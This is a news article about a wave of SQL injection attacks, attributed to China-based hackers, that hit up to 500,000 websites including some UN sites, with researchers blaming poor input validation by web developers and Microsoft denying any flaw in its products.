Security advisors have blamed sloppy work by programmers
for the latest round of China-basedhacker attackson hundreds of
thousands of websites.
Up to 500,000 web sites, including some belonging to the UN,
were reported to have been
targeted by hackers from the middle of last week.
The hackers were passing
malicious code on to visitors of infected websites by
redirecting them to malicious servers using a
common code injection method involving the database query language
SQL.
Initial reports suggested that websites might have been
compromised because of Microsoft vulnerabilities, but this week
security investigators cleared the software producer.
Mary Landesman, senior security researcher at
Scansafe, said in a report that the targeting was likely to be
the result of poor coding practices.
Stephan Chenette, manager of US-based
Websense Security Labs, said web programmers had failed to
validate user input properly.
"Web developers should heed secure development practices because
a fully patched host may still be susceptible to attack if code was
not properly checked for vulnerabilities," he said.
However, end-users have been advised to ensure they have the
most recent security updates for all their applications and to use
web-filtering software to protect their users.
Landesman said the latest SQL injection attacks are connected
with two earlier attacks in October and December last year.
She said all the attacks targeted the UN and the same code was
used, indicating that the same persons or group of people was
behind the attacks.
Chenette said the precise size of this attack was difficult to
quantify because malicious sites were continually moving, but he
said the number of infected sites has started to decrease because
of widespread awareness of the attack.
Microsoft said on the company's security response center's blog
that the attacks were not related to any known security issues
related to Microsoft's Internet Information Services (IIS) 6.0,
Active Server Pages (ASP), ASP.Net or Microsoft SQL
technologies.